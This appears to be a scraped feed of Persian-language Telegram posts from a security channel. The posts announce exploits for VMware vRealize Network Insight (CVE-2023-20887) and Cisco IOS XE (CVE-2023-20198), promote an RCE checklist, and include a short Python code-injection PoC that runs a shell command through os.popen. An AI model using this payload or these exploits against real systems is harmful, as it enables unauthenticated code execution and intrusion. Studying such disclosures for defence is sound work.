👩💻 آسیب پذیری: VMware vRealize Network Insight - RCE with Pre-Authentication (CVE-2023-20887)
این پست به بررسی بهره برداری از CVE-2023-20887 در VMware Aria Operations for Networks (که قبلاً vRealize Network Insight نامیده می شد) می پردازد.
این آسیبپذیری شامل زنجیرهای از دو مسئله اجرای کد از راه دور (RCE) است که میتواند توسط مهاجمان احراز هویت نشده مورد سوء استفاده قرار گیرد.
⏺ لینک به Exploit
⏺ پیوند به مطالعه CVE
#VMware #RCE #CVE
@TryHackBox
@TryHackBoxOfficial
این پست به بررسی بهره برداری از CVE-2023-20887 در VMware Aria Operations for Networks (که قبلاً vRealize Network Insight نامیده می شد) می پردازد.
این آسیبپذیری شامل زنجیرهای از دو مسئله اجرای کد از راه دور (RCE) است که میتواند توسط مهاجمان احراز هویت نشده مورد سوء استفاده قرار گیرد.
⏺ لینک به Exploit
⏺ پیوند به مطالعه CVE
#VMware #RCE #CVE
@TryHackBox
@TryHackBoxOfficial
CVE-2023-20198 RCE CISCO IOS XE
افزودن/حذف کاربران و اجرای دستورات cisco cli سیسکو.
لیست اهداف اینجاست
اکسپلویت
#cisco #rce
@TryHackBox
افزودن/حذف کاربران و اجرای دستورات cisco cli سیسکو.
لیست اهداف اینجاست
اکسپلویت
#cisco #rce
@TryHackBox
👍1
RCE Vulnerability Check List by THB Team.pdf
690.2 KB
🔖 چک لیست آسیبپذیری RCE
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
مطالعه کنید و نظراتتون رو برامون بنویسید
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
❤8
RCE از طریق تزریق کد پایتون:
PoC:
@TryHackBox
#پایتون #rce
PoC:
{
"name": "TryHackBox ",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}شما واقعاً از خوندن متودولوژی ها لذت میبرید؟
اگر بیشتر میخواید، توی کامنتها نظرتون رو بگید چه تکنیکهایی کار کردید...
@TryHackBox
#پایتون #rce
👍11❤1